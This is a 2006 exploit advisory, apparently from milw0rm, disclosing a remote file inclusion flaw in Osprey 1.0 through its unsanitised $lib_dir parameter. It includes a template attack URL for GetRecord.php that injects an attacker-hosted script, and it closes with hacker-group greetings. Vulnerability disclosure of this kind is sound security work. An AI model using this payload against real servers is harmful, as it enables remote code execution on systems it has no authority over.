Osprey <= 1.0 [lib_dir] Remote File Include Vulnerability
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous
Affected software description :
Application : osprey
version : 1.0
URL : http://osprey.ibiblio.org/download/osprey-1.0.tar.bz2
Description: Osprey is a peer-to-peer enabled content distribution system. A metadata management system for software and document collections enables local and distributed searching of materials. Items are available for download directly via URL or indirectly via the BitTorrent peer-to-peer protocol.
Variable $lib_dir not sanitized.When register_globals=on an attacker ca
n exploit this vulnerability with a simple php injection script.
# http://www.site.com/[path]/web/lib/xml/oai/GetRecord.php?lib_dir=[Evil_Script]
# Greetz to [Oo], str0ke, th0r, RST TEAM: [ !_30, darkking, DarkWizzard, Elias, Icarius, MiniDisc, Nemessis, Shocker, SpiridusuCaddy and sysghost !]
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]
Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://RST-CREW.NET
# milw0rm.com [2006-10-16]